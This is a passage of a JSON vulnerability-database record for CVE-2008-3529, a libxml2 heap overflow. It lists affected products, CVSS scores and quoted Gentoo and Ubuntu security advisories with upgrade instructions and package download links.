            "vendor": "gentoo",
            "version": null
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "linux mips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "voice portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.1"
          },
          {
            "model": "voice portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "model": "voice portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "model": "messaging storage server mm3.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.0"
          },
          {
            "model": "messaging storage server",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "message networking mn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "message networking",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "meeting exchange enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "meeting exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0.0.52"
          },
          {
            "model": "meeting exchange",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "model": "intuity audix lx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "model": "emmc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.021"
          },
          {
            "model": "emmc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "1.017"
          },
          {
            "model": "emmc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "model": "communication manager sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0.3"
          },
          {
            "model": "communication manager sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.4"
          },
          {
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.1"
          },
          {
            "model": "communication manager sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.0"
          },
          {
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "cms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "13.0"
          },
          {
            "model": "cms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "15.0"
          },
          {
            "model": "cms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "14.1"
          },
          {
            "model": "cms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "14.0"
          },
          {
            "model": "cms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "13.1"
          },
          {
            "model": "aura sip enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.2.1"
          },
          {
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1.6"
          },
          {
            "model": "safari for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.2.1"
          },
          {
            "model": "safari for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.2.2"
          },
          {
            "model": "safari for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.1.2"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.1.2"
          },
          {
            "model": "safari for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.1.1"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.1.1"
          },
          {
            "model": "safari beta for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.0.4"
          },
          {
            "model": "safari beta for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.0.3"
          },
          {
            "model": "safari beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.0.3"
          },
          {
            "model": "safari beta for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.0.2"
          },
          {
            "model": "safari beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.0.2"
          },
          {
            "model": "safari beta for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.0.1"
          },
          {
            "model": "safari beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.0.1"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0.4"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0.3"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0.2"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0.1"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.3.2"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.3.1"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.3"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.2.3"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.2.2"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.2.1"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.2"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.0"
          },
          {
            "model": "safari beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2"
          },
          {
            "model": "safari beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.2"
          },
          {
            "model": "safari for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.1"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.1"
          },
          {
            "model": "safari beta for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3"
          },
          {
            "model": "safari beta",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3"
          },
          {
            "model": "safari",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3"
          },
          {
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.2.1"
          },
          {
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0.2"
          },
          {
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0.1"
          },
          {
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1.4"
          },
          {
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1.3"
          },
          {
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1.2"
          },
          {
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1.1"
          },
          {
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.2"
          },
          {
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.1"
          },
          {
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0"
          },
          {
            "model": "ipod touch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1"
          },
          {
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.2.1"
          },
          {
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0.2"
          },
          {
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0.1"
          },
          {
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1.4"
          },
          {
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1.3"
          },
          {
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1.2"
          },
          {
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1.1"
          },
          {
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.0.2"
          },
          {
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.0.1"
          },
          {
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.2"
          },
          {
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.1"
          },
          {
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "2.0"
          },
          {
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1.1"
          },
          {
            "model": "iphone",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "1"
          },
          {
            "model": "safari for windows",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.2.3"
          },
          {
            "model": "safari",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.2.3"
          },
          {
            "model": "safari for windows",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4"
          },
          {
            "model": "safari",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "4"
          },
          {
            "model": "ipod touch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.0"
          },
          {
            "model": "iphone",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apple",
            "version": "3.0"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "31126"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200809-180"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001702"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-3529"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:xmlsoft:libxml2",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:apple:mac_os_x",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:apple:mac_os_x_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:apple:iphone_os",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:apple:iphone_os_for_ipod_touch",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:apple:safari",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:oracle:solaris",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:misc:miraclelinux_asianux_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:sun:opensolaris",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:sun:solaris",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux_desktop",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:linux_advanced_workstation",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:rhel_desktop_workstation",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001702"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Andreas Solberg",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200809-180"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2008-3529",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2008-3529",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-33654",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2008-3529",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2008-3529",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200809-180",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-33654",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2008-3529",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-33654"
          },
          {
            "db": "VULMON",
            "id": "CVE-2008-3529"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200809-180"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001702"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-3529"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Heap-based buffer overflow in the xmlParseAttValueComplex function in parser.c in libxml2 before 2.7.0 allows context-dependent attackers to cause a denial of service (crash) or execute arbitrary code via a long XML entity name. The \u0027libxml\u0027 library is prone to a heap-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. \nAn attacker can exploit this issue to execute arbitrary within the context of an application using the  affected library. Failed exploit attempts will result in a denial-of-service vulnerability. The libxml package provides a library of functions that allow users to manipulate XML files, including support for reading, modifying, and writing XML and HTML files. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 200812-06\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                            http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n  Severity: Normal\n     Title: libxml2: Multiple vulnerabilities\n      Date: December 02, 2008\n      Bugs: #234099, #237806, #239346, #245960\n        ID: 200812-06\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities in libxml2 might lead to execution of\narbitrary code or Denial of Service. \n\nBackground\n==========\n\nlibxml2 is the XML (eXtended Markup Language) C parser and toolkit\ninitially developed for the Gnome project. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package           /  Vulnerable  /                     Unaffected\n    -------------------------------------------------------------------\n  1  dev-libs/libxml2     \u003c 2.7.2-r1                       \u003e= 2.7.2-r1\n\nDescription\n===========\n\nMultiple vulnerabilities were reported in libxml2:\n\n* Andreas Solberg reported that libxml2 does not properly detect\n  recursion during entity expansion in an attribute value\n  (CVE-2008-3281). \n\n* A heap-based buffer overflow has been reported in the\n  xmlParseAttValueComplex() function in parser.c (CVE-2008-3529). \n\n* Christian Weiske reported that predefined entity definitions in\n  entities are not properly handled (CVE-2008-4409). \n\n* Drew Yao of Apple Product Security reported an integer overflow in\n  the xmlBufferResize() function that can lead to an infinite loop\n  (CVE-2008-4225). \n\n* Drew Yao of Apple Product Security reported an integer overflow in\n  the xmlSAX2Characters() function leading to a memory corruption\n  (CVE-2008-4226). \n\nImpact\n======\n\nA remote attacker could entice a user or automated system to open a\nspecially crafted XML document with an application using libxml2,\npossibly resulting in the exeution of arbitrary code or a high CPU and\nmemory consumption. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll libxml2 users should upgrade to the latest version:\n\n    # emerge --sync\n    # emerge --ask --oneshot --verbose \"\u003e=dev-libs/libxml2-2.7.2-r1\"\n\nReferences\n==========\n\n  [ 1 ] CVE-2008-3281\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281\n  [ 2 ] CVE-2008-3529\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529\n  [ 3 ] CVE-2008-4409\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4409\n  [ 4 ] CVE-2008-4225\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4225\n  [ 5 ] CVE-2008-4226\n        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4226\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n  http://security.gentoo.org/glsa/glsa-200812-06.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttp://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2008 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. ===========================================================\nUbuntu Security Notice USN-815-1            August 11, 2009\nlibxml2 vulnerabilities\nCVE-2008-3529, CVE-2009-2414, CVE-2009-2416\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.06 LTS\nUbuntu 8.04 LTS\nUbuntu 8.10\nUbuntu 9.04\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.06 LTS:\n  libxml2                         2.6.24.dfsg-1ubuntu1.5\n\nUbuntu 8.04 LTS:\n  libxml2                         2.6.31.dfsg-2ubuntu1.4\n\nUbuntu 8.10:\n  libxml2                         2.6.32.dfsg-4ubuntu1.2\n\nUbuntu 9.04:\n  libxml2                         2.6.32.dfsg-5ubuntu4.2\n\nAfter a standard system upgrade you need to restart your sessions to effect\nthe necessary changes. \n\nDetails follow:\n\nIt was discovered that libxml2 did not correctly handle root XML document\nelement DTD definitions. (CVE-2009-2414)\n\nIt was discovered that libxml2 did not correctly parse Notation and\nEnumeration attribute types. (CVE-2009-2416)\n\nUSN-644-1 fixed a vulnerability in libxml2. This advisory provides the\ncorresponding update for Ubuntu 9.04. \n\nOriginal advisory details:\n\n It was discovered that libxml2 did not correctly handle long entity names. (CVE-2008-3529)\n\n\nUpdated packages for Ubuntu 6.06 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5.diff.gz\n      Size/MD5:    62776 d89c05d4e7cf575a70f0f9d98db043c0\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5.dsc\n      Size/MD5:      902 5a6bda5a6cff7f1dd1b9ac5a4a4d3dee\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg.orig.tar.gz\n      Size/MD5:  3293814 461eb1bf7f0c845f7ff7d9b1a4c4eac8\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.24.dfsg-1ubuntu1.5_all.deb\n      Size/MD5:  1253066 7f0900285bcd5980021afb1187a65882\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.24.dfsg-1ubuntu1.5_all.deb\n      Size/MD5:    19366 bdcb84dd5b172486d90babd60f7abe3e\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.5_amd64.deb\n      Size/MD5:   918870 5c542ff6be1ebfe37ed53fb5c42d4f9a\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.5_amd64.deb\n      Size/MD5:   737430 1277b3e55c846153da8612c2b1bd6c05\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.5_amd64.deb\n      Size/MD5:    36698 941d28a2ab8c583df8ac8c4bd6053f7e\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5_amd64.deb\n      Size/MD5:   753036 159fc7694915d15d86868cbd34ff1ebb\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.5_amd64.deb\n      Size/MD5:   181652 5e66ae52ee397d016840038de0a2f057\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.5_i386.deb\n      Size/MD5:   766190 9afc9a70749f02669713a807ceaf2ad3\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.5_i386.deb\n      Size/MD5:   642032 6e7ac3450d6220b0b5b827483622d145\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.5_i386.deb\n      Size/MD5:    32980 5fc874170294ea6f6c94a690a01dbad7\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5_i386.deb\n      Size/MD5:   685138 4a8510c2c2b66f6c55e4155af4c7e091\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.5_i386.deb\n      Size/MD5:   166422 6cc5c19adb5ccb9db5fec9286790af1a\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.5_powerpc.deb\n      Size/MD5:   905098 dd7b7a8b76af164a73785d7c40be445c\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.5_powerpc.deb\n      Size/MD5:   761238 2f407df0d47072583fdbc6465b744b6a\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.5_powerpc.deb\n      Size/MD5:    37424 c584cfd1c16a16106d10a8d090aaccf0\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5_powerpc.deb\n      Size/MD5:   734090 42f54b7042c391a8326558cdc924fcc2\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python2.4-libxml2_2.6.24.dfsg-1ubuntu1.5_powerpc.deb\n      Size/MD5:   170808 8f4821f282453c7c516ba36e2c5fadd9\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.24.dfsg-1ubuntu1.5_sparc.deb\n      Size/MD5:   745812 84c50f29ba04c9c815e561e9c9b825ee\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.24.dfsg-1ubuntu1.5_sparc.deb\n      Size/MD5:   703538 3f2e7fbc56bf64aa9631c567852dadfd\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.24.dfsg-1ubuntu1.5_sparc.deb\n      Size/MD5:    34312 540c1cb95cd95eafe94cad690e0c7ae2\n    http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.24.dfsg-1ubuntu1.5_sparc.deb\n      Size/MD5:   716890 41e8303a6e6d3fb335a2fb06b4e1bc7a\n    